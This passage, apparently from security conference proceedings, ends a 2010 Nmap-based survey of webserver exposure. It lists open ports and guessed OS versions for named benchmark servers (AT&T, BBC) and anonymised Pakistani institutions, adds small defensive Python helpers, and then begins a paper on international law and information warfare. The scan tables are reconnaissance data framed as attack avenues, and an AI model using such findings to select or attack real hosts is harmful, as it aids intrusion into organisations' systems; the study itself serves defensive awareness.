revealed that the server is very secure based on our scans. The results show that only the ports used<br />
for web services are open and all other ports are blocked. The aggressive operating system scan<br />
shows that Linux 2.6.9 – 2.6.30 is installed on the system. Table 8 to Table 11 show the scan results<br />
for the AT&T webserver. Table 11 shows only general purpose OSs from the result, because the<br />
webserver should be installed with a general purpose server OS.<br />
Table 8: Scan details for AT&T<br />
Scanned Web Server www.att.com (118.214.121.145)<br />
Scan Launching Time 2010-08-14 00:51 PKST<br />
Scan Type Slow Comprehensive Scan<br />
Scan Time 2982.98 seconds<br />
Raw packets sent 5125 (198.226KB)<br />
Raw packets received 778 (43.980KB)<br />
Table 9: Port scan result for AT&T<br />
Port Protocol State Service<br />
80 Tcp Open http<br />
443 Tcp Open https<br />
Table 10: Aggressive OS scan result for AT&T (Most probable)<br />
OS Name and Version Type Vendor OS Family OS Generation Accuracy of result<br />
Linux 2.6.9 – 2.6.30 General Purpose Linux Linux 2.6.X 93%<br />
Table 11: Aggressive OS scan result for AT&T (Other)<br />
Type Vendor OS Family OS Generation Accuracy of result<br />
General Purpose Linux Linux 88%<br />
General Purpose Toshiba Linux 2.4.X 88%<br />
General Purpose Linux Linux 2.4.X 87%<br />
5.3 News channels<br />
To set the benchmark for news channels’ webservers, we analyzed the BBC webserver, which<br />
revealed that the only open ports are those used to provide web services. The results also show some<br />
ports in the Open | filtered state, which means the scan could not determine whether the port is open<br />
or firewalled. An SNMP port, which is used for managing the server, was found open. Overall, the<br />
web server has good security. The aggressive OS scan revealed that Linux 2.6.9 – 2.6.18 is installed<br />
on the server. Table 12 to Table 14 show the scan results for the BBC web server.<br />
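The Open | filtered ambiguity is inherent to UDP scanning: per the Nmap reference documentation, a UDP reply marks the port open, an ICMP port-unreachable error (type 3, code 3) marks it closed, other ICMP unreachable codes mark it filtered, and silence leaves it ambiguous. A minimal sketch of that decision rule:<br />

```python
def classify_udp_probe(got_udp_reply, icmp_type=None, icmp_code=None):
    """Map the outcome of a single UDP probe to an Nmap-style port state.

    Rules (as described in the Nmap reference documentation):
      any UDP reply                     -> open
      ICMP type 3, code 3               -> closed
      ICMP type 3, code 1/2/9/10/13     -> filtered
      no response at all                -> open|filtered (ambiguous)
    """
    if got_udp_reply:
        return "open"
    if icmp_type == 3 and icmp_code == 3:
        return "closed"
    if icmp_type == 3 and icmp_code in (1, 2, 9, 10, 13):
        return "filtered"
    return "open|filtered"
```

This is why the BBC scan can state definitively that UDP 161 (SNMP) is open, while ports such as UDP 123 remain ambiguous.<br />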
Table 12: Scan details for BBC<br />
Scanned Web Server www.bbc.co.uk (212.58.244.71)<br />
Scan Launching Time 2010-08-14 01:01 PKST<br />
Scan Type Slow Comprehensive Scan<br />
Scan Time 1211.74 seconds<br />
Raw packets sent 2593 (96.057KB)<br />
Raw packets received 3662 (191.411KB)<br />
Table 13: Port Scan result for BBC<br />
Port Protocol State Service<br />
80 Tcp Open http<br />
135 Tcp Filtered Msrpc<br />
139 Tcp Filtered Netbios-ssn<br />
443 Tcp Open http<br />
445 Tcp Filtered Microsoft-ds<br />
1720 Tcp Filtered H.323/Q.931<br />
5060 Tcp Filtered Sip<br />
53 Udp Open | filtered<br />
123 Udp Open | filtered<br />
135 Udp Filtered Msrpc<br />
136 Udp Filtered Profile<br />
137 Udp Filtered Netbios-ns<br />
138 Udp Filtered Netbios-dgm<br />
139 Udp Filtered Netbios-ssn<br />
161 Udp Open Snmp<br />
445 Udp Filtered Microsoft-ds<br />
5060 Udp Open | filtered<br />
20919 Udp Open | filtered<br />
Table 14: Aggressive OS scan results for BBC<br />
OS Name and Version Type Vendor OS Family OS Generation Accuracy of result<br />
Linux 2.6.9 – 2.6.18 General Purpose Linux Linux 2.6.X 93%<br />
6. Analysis of web servers of Pakistan<br />
Webservers of the most prominent organizations in Pakistan were analyzed. The webservers chosen<br />
for scanning belong to organizations very similar, in services and status, to those used to set the<br />
benchmarks. The identities of the Pakistani webservers are withheld because naming the<br />
organizations might harm their reputations. The trend shown is nevertheless very common: anyone<br />
who scans various webservers in Pakistan will reach the same conclusion. A randomly chosen<br />
organization is likely to reveal a similar level of security, because this study analyzed the most<br />
reputable organizations, which should be the first to implement security.<br />
6.1 Education and research institutions<br />
For analyzing the webservers of education and research organizations, the webservers of reputable<br />
universities in the country were selected. Two web servers were scanned.<br />
The analysis of the first web server revealed that it is also being used as a mail, FTP, DNS and<br />
database server, and the ports for all of these services were open. A webserver belonging to such a<br />
large organization should be used only as a webserver; if other services must be provided, they<br />
should sit behind a firewall. None of the ports was found filtered, which may mean that the<br />
organization does not even have a firewall protecting the web server. A firewall does not guarantee<br />
complete security, but it is the first step in securing a server; intrusion detection and prevention<br />
should also be used to enhance security. Here, however, the situation is worse: either no firewall has<br />
been installed, or it is not being used to protect the server. The scan also revealed that Microsoft<br />
Windows Server 2003 SP2 is installed on the server, which, due to its extensive use, is more<br />
vulnerable to attacks than a Linux-based OS. Table 18 shows the other possibilities (Windows XP<br />
and 2000), but one can judge that these would not be installed on a webserver.<br />
Table 15: Scan details<br />
Scanned Web Server Hidden (because of Possible Objections)<br />
Scan Launching Time 2010-08-14 00:49 PKST<br />
Scan Type Slow Comprehensive Scan<br />
Scan Time 4214.71 seconds<br />
Raw packets sent 5090 (195.486KB)<br />
Raw packets received 191 (11.459KB)<br />
Table 16: Port scan results<br />
Port Protocol State Service<br />
20 Tcp Closed ftp-data<br />
21 Tcp Open ftp<br />
25 Tcp Open Smtp<br />
26 Tcp Open Smtp<br />
53 Tcp Open Domain<br />
80 Tcp Open http<br />
110 Tcp Open Pop3<br />
143 Tcp Open Imap<br />
443 Tcp Closed https<br />
465 Tcp Closed Smtps<br />
995 Tcp Open Pop3<br />
1038 Tcp Closed Unknown<br />
1039 Tcp Closed Unknown<br />
1434 Tcp Closed Ms-sql-m<br />
2006 Tcp Open Mysql<br />
3306 Tcp Open Mysql<br />
3389 Tcp Open Microsoft-rdp<br />
8402 Tcp Open http<br />
8443 Tcp Open http<br />
53 Udp Open Domain<br />
161 Udp Closed Snmp<br />
162 Udp Closed Snmptrap<br />
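The problem described above can be framed as a simple policy check: a dedicated public webserver’s open TCP ports should be a subset of the web-service ports. A hedged sketch, where the allowed-port set is an illustrative policy rather than a universal rule:<br />

```python
# Illustrative policy only: ports a dedicated public webserver needs to expose.
ALLOWED_WEB_PORTS = {80, 443}

def policy_violations(open_ports, allowed=frozenset(ALLOWED_WEB_PORTS)):
    """Return, sorted, the open ports that a web-only policy would flag."""
    return sorted(set(open_ports) - set(allowed))

# Open TCP ports reported for the first university server (Table 16):
table16_open = [21, 25, 26, 53, 80, 110, 143, 995, 2006, 3306, 3389, 8402, 8443]
flagged = policy_violations(table16_open)
# Everything except port 80 is flagged: FTP, mail, DNS, MySQL, RDP and
# non-standard HTTP ports all widen the attack surface.
```

Applied to Table 16, the check flags every open port except 80, which matches the assessment above.<br />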
Table 17: Aggressive OS scan results (Most probable)<br />
OS Name and Version Type Vendor OS Family OS Generation Accuracy of result<br />
Microsoft Windows Server 2003 SP2 General Purpose Microsoft Windows 2003 96%<br />
Table 18: Aggressive OS scan results (Other)<br />
Type Vendor OS Family OS Generation Accuracy of result<br />
General Purpose Microsoft Windows XP 95%<br />
General Purpose Microsoft Windows 2000 89%<br />
The second webserver scanned also revealed a poor state of security. An SSH server listening on<br />
port 26 was found open to the Internet, which it should not be. DNS, MySQL and the other ports<br />
detailed in Table 20 were also found open, which they likewise should not be. Many ports are in the<br />
Open | filtered state, meaning they might be open or firewalled. The web server is therefore<br />
potentially insecure, as can easily be seen from the port scan results. The aggressive OS scan<br />
reveals, with 97% accuracy, that Linux 2.4.28 – 2.4.35 is installed on the server; the other OS<br />
guesses also indicate that the webserver runs Linux. Such an old Linux version is a potential security<br />
threat, as it might not provide the required security. Scan results for the institution are shown in<br />
Table 19 to Table 22.<br />
Table 19: Scan details<br />
Scanned Web Server Hidden (because of Possible Objections)<br />
Scan Launching Time 2010-08-14 00:48 PKST<br />
Scan Type Slow Comprehensive Scan<br />
Scan Time 1132.40 seconds<br />
Raw packets sent 2550 (92.637KB)<br />
Raw packets received 4548 (237.954KB)<br />
Table 20: Port scan results<br />
Port Protocol State Service<br />
26 Tcp Open Ssh<br />
53 Tcp Open Domain<br />
80 Tcp Open http<br />
111 Tcp Open Rpcbind<br />
1720 Tcp Filtered H.323/Q.931<br />
3306 Tcp Open Mysql<br />
5060 Tcp Filtered Sip<br />
8009 Tcp Open<br />
32768 Tcp Open Rpcbind<br />
53 Udp Open Domain<br />
111 Udp Open Rpcbind<br />
135 Udp Open | filtered<br />
5003 Udp Open | filtered<br />
5060 Udp Open | filtered<br />
18676 Udp Open | filtered<br />
18818 Udp Open | filtered<br />
20279 Udp Open | filtered<br />
21454 Udp Open | filtered<br />
23176 Udp Open | filtered<br />
32768 Udp Open Rpcbind<br />
32769 Udp Open | filtered<br />
32772 Udp Open | filtered<br />
48480 Udp Open | filtered<br />
54711 Udp Open | filtered<br />
57409 Udp Open | filtered<br />
63420 Udp Open | filtered<br />
Table 21: Aggressive OS scan results (most probable)<br />
OS Name and Version Type Vendor OS Family OS Generation Accuracy of result<br />
Linux 2.4.28 – 2.4.35 General Purpose Linux Linux 2.4.X 97%<br />
Table 22: Aggressive OS scan results (other)<br />
Type Vendor OS Family OS Generation Accuracy of result<br />
General Purpose Ubiquiti Linux 2.4.X 95%<br />
General Purpose Linux Linux 2.6.X 94%<br />
6.2 Commercial organizations<br />
For the commercial organization, the webserver scanned belongs to the organization that provides in<br />
Pakistan the same services AT&T provides in America. The organization has hundreds of millions of<br />
customers and was selected because it should be among the first to implement security. The scan<br />
reveals alarming results: even the telnet port is open, as is SSH. The server is being used as an FTP,<br />
telnet, SSH, mail (SMTP, IMAP, POP3) and many other servers, as shown by the fourth column of<br />
Table 24. Many ports are open on the server to provide these various services, although a webserver<br />
is supposed to provide only web services and should not be used as any other server, at least in such<br />
a large organization. The OS installed is a prerelease version of FreeBSD, which is released to find<br />
bugs; the server should instead run a stable OS.<br />
Table 23: Scan Details<br />
Scanned Web Server Hidden (because of Possible Objections)<br />
Scan Launching Time 2010-08-14 00:50 PKST<br />
Scan Type Slow Comprehensive Scan<br />
Scan Time 7589.54 seconds<br />
Raw packets sent 2387 (88.397KB)<br />
Raw packets received 2302 (112.940KB)<br />
Table 24: Port scan results<br />
Port Protocol State Service<br />
21 Tcp Open ftp<br />
22 Tcp Open Ssh<br />
23 Tcp Open telnet<br />
25 Tcp Open Smtp<br />
80 Tcp Open http<br />
106 Tcp Open Pop3pw<br />
110 Tcp Open Pop3<br />
143 Tcp Open Imap<br />
443 Tcp Open http<br />
587 Tcp Open Smtp<br />
993 Tcp Open Imap<br />
995 Tcp Open Pop3<br />
1720 Tcp Filtered H.323/Q.931<br />
3306 Tcp Open Mysql<br />
5060 Tcp Filtered Sip<br />
5190 Tcp Open Smtp<br />
8009 Tcp Open Ajp13<br />
8080 Tcp Open http<br />
9878 Tcp Open http<br />
514 Udp Open | filtered<br />
5060 Udp Open | filtered<br />
5632 Udp Open | filtered<br />
49169 Udp Open | filtered<br />
Table 25: Aggressive OS scan results (most probable)<br />
OS Name and Version Type Vendor OS Family OS Generation Accuracy of result<br />
FreeBSD 6.3-PRERELEASE General Purpose FreeBSD FreeBSD 6.X 96%<br />
Table 26: Aggressive OS scan results (other)<br />
Type Vendor OS Family OS Generation Accuracy of result<br />
General Purpose FreeBSD FreeBSD 5.X 93%<br />
General Purpose FreeBSD FreeBSD 7.X 90%<br />
General Purpose Apple Mac OS X 10.4.X 89%<br />
General Purpose Apple Mac OS X 10.5.X 89%<br />
General Purpose FreeBSD FreeBSD 8.X 89%<br />
General Purpose FreeBSD FreeBSD 5.X 89%<br />
6.3 News channel<br />
For this type of organization, the webserver of the country’s most widely watched and most trusted<br />
news channel was scanned. The results showed that the server is being used for many other services,<br />
such as FTP, mail and DNS, as can be seen from Table 28. Many ports were found open on such a<br />
sensitive website. The aggressive OS scan also shows, with 97% accuracy, that Microsoft Windows<br />
Server 2003 SP2 is installed on the server, which, due to its extensive use, is more vulnerable to<br />
attacks. The other OS guesses shown in Table 30 would not be installed on a server system. Results<br />
are shown in Table 27 to Table 30.<br />
Table 27: Scan results<br />
Scanned Web Server Hidden (because of Possible Objections)<br />
Scan Launching Time 2010-08-14 01:03 PKST<br />
Scan Type Slow Comprehensive Scan<br />
Scan Time 1772.15 seconds<br />
Raw packets sent 2265 (85.521KB)<br />
Raw packets received 2354 (117.486KB)<br />
Table 28: Port scan result<br />
Port Protocol State Service<br />
21 Tcp Filtered ftp<br />
25 Tcp Open Smtp<br />
53 Tcp Open Domain<br />
80 Tcp Open http<br />
110 Tcp Open Pop3<br />
135 Tcp Open Msrpc<br />
445 Tcp Open Microsoft-ds<br />
646 Tcp Filtered Ldp<br />
1026 Tcp Open Msrpc<br />
1027 Tcp Open Msrpc<br />
1248 Tcp Open Netsaint<br />
1433 Tcp Open Ms-sql-s<br />
1720 Tcp Filtered H.323/Q.931<br />
3306 Tcp Open Mysql<br />
3389 Tcp Open Microsoft-rdp<br />
5060 Tcp Filtered Sip<br />
8081 Tcp Open http<br />
8402 Tcp Open http<br />
8443 Tcp Open http<br />
9999 Tcp Open http<br />
53 Udp Open Domain<br />
123 Udp Open | filtered<br />
161 Udp Open | filtered<br />
445 Udp Open | filtered<br />
500 Udp Open | filtered<br />
1028 Udp Open | filtered<br />
1434 Udp Open | filtered<br />
3456 Udp Open | filtered<br />
4500 Udp Open | filtered<br />
5060 Udp Open | filtered<br />
Table 29: Aggressive OS scan results (most probable)<br />
OS Name and Version Type Vendor OS Family OS Generation Accuracy of result<br />
Microsoft Windows Server 2003 SP2 General Purpose Microsoft Windows 2003 97%<br />
Table 30: Aggressive OS scan results (other)<br />
Type Vendor OS Family OS Generation Accuracy of result<br />
General Purpose Microsoft Windows XP 91%<br />
General Purpose Microsoft Windows 2000 88%<br />
General Purpose Microsoft Windows PocketPC/CE 88%<br />
7. Conclusion and suggestions<br />
Looking at the statistics presented, it can easily be seen that the most prominent organizations in<br />
Pakistan do not keep their webservers secure. The results show a large number of ports that can be<br />
used to attack the webservers; each such port is a potential avenue of attack for ill-intentioned<br />
people. The results can be compared with the benchmarks, which show the best security. On this<br />
basis it can be inferred that, if these wealthy and large organizations do not bother to invest time and<br />
money in network security, conditions at small organizations will be worse. This study is intended<br />
only to give an overview of the importance given to security in our region and is by no means a<br />
detailed security analysis of these webservers. Webservers are used merely as an index of security<br />
practices, because they are the most easily accessible and most important resource of an<br />
organization.<br />
All organizations with webservers or networks connected to the Internet should use scanners like<br />
Nmap (which we have used in this study) to find the security loopholes in their networks and then try<br />
to rectify them. Every organization should have a proper network security policy, and it should be<br />
ensured that the policy is implemented well. Every effort should be made to make the network as<br />
secure as possible. Even the most secure networks are not fully secure today, so insecure networks<br />
can present many difficulties and problems; these might not be apparent now, but insecure networks<br />
will pay the price in the future.<br />
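The self-audit recommended here can be partly automated. Nmap’s grepable output format (-oG) puts each host’s port list on one line; the sketch below (using a made-up sample line, not real scan data) extracts the open ports so they can be reviewed against the organization’s security policy.<br />

```python
import re

def open_ports_from_grepable(line):
    """Extract (port, proto, service) tuples in the 'open' state from one
    line of Nmap grepable (-oG) output, whose port fields look like
    '80/open/tcp//http///'."""
    m = re.search(r"Ports: (.*)", line)
    if not m:
        return []
    entries = []
    for field in m.group(1).split(","):
        parts = field.strip().split("/")
        # parts: [port, state, protocol, owner, service, rpc info, version]
        if len(parts) >= 5 and parts[1] == "open":
            entries.append((int(parts[0]), parts[2], parts[4]))
    return entries

# Hypothetical sample line for illustration only:
sample = ("Host: 203.0.113.10 (web.example) Ports: 80/open/tcp//http///, "
          "23/filtered/tcp//telnet///, 443/open/tcp//https///")
# open_ports_from_grepable(sample) -> [(80, 'tcp', 'http'), (443, 'tcp', 'https')]
```

Feeding the flagged ports into a policy review, as the conclusion recommends, would turn each scan into a repeatable audit step.<br />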
Pakistan is already suffering from terrorism. Thousands of people have lost their lives and billions of<br />
dollars have been spent on the war against terrorism. Cyber terrorism is one of the next avenues that<br />
terrorists can use to give a new direction to their activities. One can imagine the severe<br />
consequences if terrorists were able to exploit the webserver of a popular news channel. They could<br />
transmit a message about a plane crash, the presence of a bomb in a crowded place, or an<br />
announcement of an attack on the country’s active enemy, among many others that could have very<br />
adverse effects. Pakistan, being a nuclear power, cannot afford this in any case, because it might<br />
lead to a nuclear war.<br />
References<br />
Ahmad A. Abu-Musa (2006), "Evaluating the Security Controls of CAIS in Developing Countries: The Case of<br />
Saudi Arabia," The International Journal of Digital Accounting Research, vol. 6 no. 11, pp. 25 – 64<br />
Australian Taxation Office (2008), ‘Information Security Practices Review’ V2.0, [Online] Available:<br />
http://www.ato.gov.au/content/downloads/COR138560InfoSecurity.pdf [April 2008]<br />
DawnNews (2010), ‘Govt starts securing 36 hacked websites’, [Online] Available:<br />
http://www.dawn.com/2010/11/30/forty-pakistan-government-websites-hacked.html [30 November 2010]<br />
GEO Pakistan (2010), ‘Supreme court website hacked’, [Online] Available: http://www.geo.tv/9-30-<br />
2010/72139.htm [30 September 2010]<br />
Jahanzaib Haque (2010), 'Cyber warfare: Indian hackers take down 36 govt websites', The Express Tribune,<br />
[Online] Available: http://tribune.com.pk/story/84269/cyber-warfare-indian-hackers-take-down-36-govt-websites/<br />
[01 Dec 2010]<br />
Nmap Reference Guide, [Online] Available: http://nmap.org/book/man.html<br />
PakCert (2005), ‘Defacement Archive of hacked Pakistani Web Sites’, Pakistan Computer Emergency Response<br />
Team [Online] Available: http://www.pakcert.org/defaced/index.html<br />
PakCert (2008), ‘Defacement Statistics (January 1999 - August 2008)’, Pakistan Computer Emergency<br />
Response Team [Online] Available: http://www.pakcert.org/defaced/stats.html<br />
Rafael Etges, Walid Hejazi and Alan Lefort (2009), "A Study on Canadian IT Security Practices," ISACA Journal,<br />
vol. 2, pp. 1 – 3, [Online] Available: http://www.isaca.org/Journal/Past-Issues/2009/Volume-<br />
2/Documents/jpdf0902-online-a-study.pdf<br />
Syed M. Amir Husain (1998), 'Pakistan needs an Information Warfare capability', Defence Journal, [Online]<br />
Available: http://www.defencejournal.com/july98/pakneeds1.htm<br />
The Express Tribune (2010), ‘36 government sites hacked by 'Indian Cyber Army'’, [Online] Available:<br />
http://tribune.com.pk/story/83967/36-government-websites-hacked-by-indian-cyber-army/ [30 November<br />
2010]<br />
Trend Micro (2009), “Data-stealing Malware on the Rise – Solutions to Keep Businesses and Consumers Safe”,<br />
[Online] Available:<br />
http://us.trendmicro.com/imperia/md/content/us/pdf/threats/securitylibrary/data_stealing_malware_<br />
focus_report_-_june_2009.pdf [June 2009]<br />
United States Environmental Protection Agency – Office of Inspector General (2006), ‘Information Security<br />
Series: Security Practices' Report No. 2006-P-00010, [Online] Available:<br />
http://www.epa.gov/oig/reports/2006/20060131-2006-P-00010.pdf [31 January 2006]<br />
Vorakulpipat, C.; Siwamogsatham, S.; Pibulyarojana, K. (2010) , "Exploring information security practices in<br />
Thailand using ISM-Benchmark," Proceedings of Technology Management for Global Economic Growth<br />
(PICMET), 2010, pp.1-4, 18-22 July 2010<br />
International Legal Issues and Approaches Regarding<br />
Information Warfare<br />
Alexandru Nitu<br />
Romanian Intelligence Service, Bucharest, Romania<br />
alexandru.nitu@gmail.com<br />
Abstract: In present times, societies and economies increasingly rely on electronic communications, becoming<br />
more vulnerable to threats from cyberspace. At the same time, states' military and intelligence organizations are<br />
increasingly developing the capability to attack and defend computer systems. The progress of information<br />
technology makes it possible for adversaries to attack each other in new ways, inflicting new forms of damage;<br />
technological change enables cyberwarfare acts that do not fit within existing legal categories, or may reveal<br />
contradictions among existing legal principles. The paper examines the relationship between information warfare<br />
and the law, especially international law and the law of war, as it is apparent that some fundamental questions<br />
regarding this new and emerging type of security threat need to be explored. For example, what types of<br />
activities between nation states could or should be called information warfare? What are ‘force’, ‘armed attack’,<br />
or ‘armed aggression’ - terms from the UN Charter - in the Information Age, and do they equate to information<br />
warfare? Information warfare is neither ‘armed’ in the traditional sense, nor does it necessarily involve conflict, so<br />
an important issue is if ‘war’ between states necessarily require physical violence, kinetic energy, and human<br />
casualties. A threshold question that arises from the development of information warfare techniques is thus the<br />
definitional one: has the development of information warfare technology and techniques taken information<br />
warfare out of the existing legal definition of war? Characteristics of information technology and warfare pose<br />
problems to those who would use international law to limit information warfare, and leave legal space for those<br />
who would wage such warfare. Consequently, there may be confusion over what limits may apply to the conduct<br />
of information warfare, and when information warfare attacks may be carried out. Prospects of new technological<br />
attacks pose problems for international law because law is inherently conservative. From this point of view, the<br />
paper examines how the law itself might change in response to the fast development of information technology<br />
and how long-established legal principles such as national sovereignty and the inviolability of national borders<br />
will be affected by the ability of cyberspace to transcend such concepts.<br />
Keywords: international law, information warfare, use of force, Charter of the United Nations, Geneva<br />
conventions<br />
1. Introduction<br />
Intensive development of information and communication technologies and their wide use in all<br />
spheres of human activity have accelerated post-industrial development and the building of a global<br />
information society, becoming a driving force for social development. The global information<br />
infrastructure provides unprecedented opportunities for communication among people, their<br />
socialization and access to information. Individuals, societies and states depend on the stability and<br />
reliability of the information infrastructure.<br />
Computers and computer networks have become increasingly integral to government, military, and<br />
civilian functions. They allow instant communication and provide platforms on which business and<br />
government alike can operate. Computers now control both military and civilian infrastructures,<br />
including nuclear arsenals, telecommunication networks, electrical power systems, water supplies, oil<br />
storage facilities, financial systems, and emergency services.<br />
As the worldwide explosion of information technology (IT) is changing the ways that business,<br />
government, and education are conducted, it also promises to change the way wars are waged. The<br />
development of information technology makes it possible for adversaries to attack each other in new<br />
ways and to inflict new forms of damage, and may create new targets for attack. Attackers may use<br />
international networks to damage or disrupt enemy systems, without ever physically entering the<br />
enemy's country.<br />
Information technologies enable a fundamentally new and effective means to disrupt or destroy a<br />
country's industry, its economy, social infrastructure and public administration. They have the<br />
potential to be a means of combat capable of achieving goals related to inter-state confrontation at<br />
the tactical, operational and strategic levels. Whatever the development and diffusion of information<br />
technology mean for the future of warfare, it is apparent that many of the new forms of attack that<br />
information technology enables are qualitatively different from prior forms of attack. The use of such<br />
tools as computer intrusion and computer viruses, for example, take war out of the physical, kinetic<br />
world and bring it into an intangible, electronic one. Effects previously attainable only through physical<br />
destruction are now accomplished remotely with the silent means of information technology.<br />
These new ways of fighting have been labeled Information Warfare (IW). Definitions and conceptions<br />
of IW are numerous, but generally entail preserving one’s own information and information technology<br />
while exploiting, disrupting, or denying the use of an adversary’s (Shackelford 2009). In US military<br />
doctrine, IW is part of a much larger strategic shift that was named Information Operations (IO).<br />
Information Operations involve actions taken to affect adversary information and information systems<br />
while defending one’s own information and information systems. Information Operations apply across<br />
all phases of an operation, throughout the range of military operations, and at every level of war.<br />
Information Warfare is Information Operations conducted during time of crisis or conflict, including<br />
war, to achieve or promote specific objectives over a specific adversary or adversaries (Joint Chiefs of<br />
Staff 1998).<br />
The new vulnerabilities that the information age generates are more likely to be exploited by<br />
opponents of developed states that cannot hope to prevail on the battlefield, or even at the<br />
negotiations table. A lesser-advantaged state hoping to seriously harm a dominant adversary must<br />
inevitably compete asymmetrically. It must seek to counter the strengths of the opponent not head-on,<br />
but rather employing unorthodox means to strike at centers of gravity.<br />
IW offers such asymmetrical benefits. In the first place, in many cases a computer network attack will<br />
either not merit a response involving the use of force, or the legality of such a response could be<br />
debatable, even if the victim is able to accurately identify the attack and its source. Thus, because of<br />
the potentially grave impact of cyber attacks on a state’s infrastructure, it can prove a high gain, low<br />
risk option for a state outclassed militarily or economically. Moreover, to the extent that an opponent is<br />
militarily and economically advantaged, it is probably technologically dependent, and, therefore,<br />
teeming with tempting targets.<br />
2. IW and the ‘use of force’ concept<br />
Several rules govern when force can be used (the jus ad bellum, which focuses on the criteria for<br />
going to war, covering issues such as right purpose, duly constituted authority, last resort) and how<br />
states can use that force in an armed conflict (the jus in bello or ‘law of war’, which creates the concept<br />
of just war-fighting, covering discrimination, proportionality, humanity etc). These rules have diverse<br />
sources, including the U.N. Charter, international humanitarian law treaties, including the 1949<br />
Geneva Conventions, as well as customary international humanitarian law. Some of these existing<br />
laws involve principles of general applicability that could encompass IW. Nevertheless, the gap<br />
between physical weaponry (whether kinetic, biological, or chemical) and IW’s virtual methods can be<br />
substantial, creating translation problems.<br />
The sort of intangible damage that IW attacks may cause is analytically different from the physical<br />
damage caused by the use of armed force in traditional warfare. The kind of destruction that bombs<br />
and bullets cause is easy to see and understand, and fits well within longstanding views of what war<br />
means. In contrast, the disruption of information systems, including the corruption or manipulation of<br />
stored or transmitted data, may cause intangible damage, such as disruption of civil society or<br />
government services. These may be more closely equivalent to activities such as economic sanctions<br />
that may be undertaken in times of peace rather than acts of aggression (Greenberg 1998).<br />
Whether or not an information warfare attack can be considered ‘use of force’ or ‘aggression’ is<br />
relevant to the fact that a forceful response can be justified as self-defense, as well as to the issue of<br />
whether a particular response would be proportionate to the original attack.<br />
Modern law on the use of force is based on the U.N. Charter. An analysis of international law and IW<br />
could begin with the prohibition of the use of force in Article 2(4): ‘All Members shall refrain in their<br />
international relations from the threat or use of force against the territorial integrity or political<br />
independence of any state, or in any other manner inconsistent with the Purposes of the United<br />
Nations’ (Charter of the United Nations, Art.2(4)). The drafters intended to prohibit all types of force,<br />
except those carried out under the aegis of the United Nations or as provided for by the Security<br />
Council, and wanted to restrict the use of force severely by sharply limiting its use to situations<br />
approved by the Security Council (Barkham 2001).<br />
The fact is that neither the Charter nor any international body has defined the term ‘use of force’<br />
clearly. That might be the main reason why the use of force prohibition encounters difficulty when<br />
translated into the IW context. Not all hostile acts are uses of force. Traditionally, states defined ‘force’<br />
in terms of the instrument used, including ‘armed’ force within the prohibition, but excluding economic<br />
and political forms of coercion. This distinction reflects an effort to proscribe those acts most likely to<br />
interfere with the U.N.’s primary purpose: maintaining international peace and security.<br />
The classic ‘instrumentality’ approach argues that IW does not qualify as armed force because it lacks<br />
the physical characteristics associated with military coercion (Hollis 2007). The analysis looks at<br />
whether there is kinetic impact: some type of explosion or physical force. The Charter was created in<br />
the days of weapons that provided blast, heat, and fragmentation damage, so it is clear that these<br />
types of kinetic weapons were exclusively present in the minds of the drafters.<br />
Still, some types of cyber attacks can be determined to be uses of force. Since the determination of a<br />
use of force requires that a weapon be used, there first must be a method of analogizing IW attacks to<br />
weapons. A very good method could be the one proposed by Ian Brownlie, which shifts the traditional<br />
use of force analysis from a purely kinetic analysis, based on physical force being applied to the<br />
target, to a result-based analysis, so that the evaluation of IW attacks is not limited to the method of<br />
the attack (Brownlie 1963). A result-based analysis requires looking at whether there is a kinetic result<br />
that causes damage or injury, rather than whether the weapon itself is kinetic.<br />
The text of the U.N. Charter offers additional support for the ‘instrumentality’ view in Article 41, which<br />
states that ‘measures not involving the use of armed force’ include ‘complete or partial interruption of<br />
(…) telegraphic, radio, and other means of communication’ (Charter of the United Nations, Art.41).<br />
Clearly, ‘other means of communications’ fairly encompasses computer communications and<br />
communication over computer networks. It seems that Article 41 permits countries to deprive another<br />
nation of its communications, as well as to interrupt communications by manipulating the target<br />
country's data such that it is corrupt and untrustworthy, to alter the data to render it useless for that<br />
nation's purpose, or actually to alter the data such that it achieves an intended purpose for the<br />
aggressor nation (DiCenso 2000). Although such measures sound like fair game for IW, the<br />
provisions of Article 41 still require the Security Council to decide what measures are to be employed<br />
under that article, including force and actions that do not include armed force.<br />
In order to retain its effectiveness, the Charter’s interpretations must evolve to some degree. The<br />
extent to which this happens is important in applying use of force analysis under Article 2(4) as new<br />
types of warfare develop. If the definition of the ‘use of force’ is static, then the ban on the use of force<br />
gradually will become less effective as new interstate actions occur beyond the boundaries of what<br />
the drafters considered (Barkham 2001).<br />
Difficulty in characterizing certain forms of information warfare as ‘force’ or ‘aggression’ under<br />
international law does not mean that international legal institutions cannot respond to such attacks.<br />
For example, Chapter VII of the U.N. Charter gives the UN Security Council the authority and<br />
responsibility to determine the existence of any ‘threat to the peace’ or acts of aggression (Charter of<br />
the United Nations, Article 39) and the Council can recommend and lead responses to that (Charter of<br />
the United Nations, Article 40). Many information attacks that may not constitute ‘force’ or ‘aggression’<br />
could certainly be considered threats to the peace and thus subject to Security Council action,<br />
perhaps including the use of military force. After all, anything that would anger a government to the<br />
point that it might feel the need to resort to military action could thus threaten the peace, even if the<br />
provocative action was not technically illegal (Greenberg 1998).<br />
Of particular interest for IW analysis is Article 51 of the U.N. Charter, the only exception to the rule<br />
stated in Article 2(4). According to Article 51, states can use force pursuant to the inherent right of<br />
self-defense in response to an armed attack: ’Nothing in the present Charter shall impair the inherent<br />
right of individual or collective self-defense if an armed attack occurs against a Member of the United<br />
Nations, until the Security Council has taken measures necessary to maintain international peace and<br />
security’ (Charter of the United Nations, Art.51). As sole authorization of unilateral use of force outside<br />
the U.N. Charter security system, this provision responds to the reality that the international<br />
community may not be able to react quickly enough to armed aggression to forestall attack on a victim<br />
state. It therefore permits states and their allies to defend themselves until the international help<br />
arrives pursuant to Chapter VII.<br />
Article 51 restricts a state’s right of self-defense to situations involving ’armed attack’, a narrower<br />
category of act than Article 2(4)’s ’use of force’. Although coercion not involving armed force may<br />
violate Article 2(4) and result in action under Article 39, it does not follow that states may also react<br />
unilaterally pursuant to Article 51. This narrowing plainly reflects the Charter’s preference for<br />
community responses over individual ones, even to threats to peace (Schmitt 1999). In the case of an<br />
IW attack, it is also a prudent approach due to the difficulty states may have in identifying the correct<br />
source of an attack.<br />
The main problem IW poses for Article 2(4) does not derive from its large-scale applications, but from<br />
attacks that do not destroy life or property, such as subversion of property, electronic blockades, and<br />
incursions. The large-scale attacks are similar to conventional methods of warfare and fit comfortably<br />
within traditional use of force analysis. The lower-level attacks present the problem when analyzed<br />
under Article 2(4) because they threaten to erase the distinction between acts of force and acts of<br />
